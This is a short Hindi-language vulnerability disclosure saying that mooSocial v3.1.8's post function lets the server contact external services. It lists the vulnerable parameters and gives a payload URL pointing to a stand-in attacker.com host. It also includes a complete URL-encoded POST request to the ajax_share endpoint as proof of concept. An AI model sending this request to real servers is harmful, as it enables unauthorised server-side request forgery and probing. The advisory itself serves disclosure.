
mooSocial v3.1.8 post function पर external service interaction के लिए संवेदनशील है।
mooSocial v3.1.8 पोस्ट फ़ंक्शन पर बाहरी सेवा इंटरैक्शन के प्रति असुरक्षित है। निष्पादित होने पर, सर्वर बाहरी सर्वर को HTTP और DNS अनुरोध भेजता है।
असुरक्षित पैरामीटर: messageText, data[wall_photo], data[userShareVideo] और data[userShareLink]
पेलोड : http://attacker.com/?null=
/moosocial/activities/ajax_share पर POST अनुरोध (केवल POST अनुरोध डेटा):
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
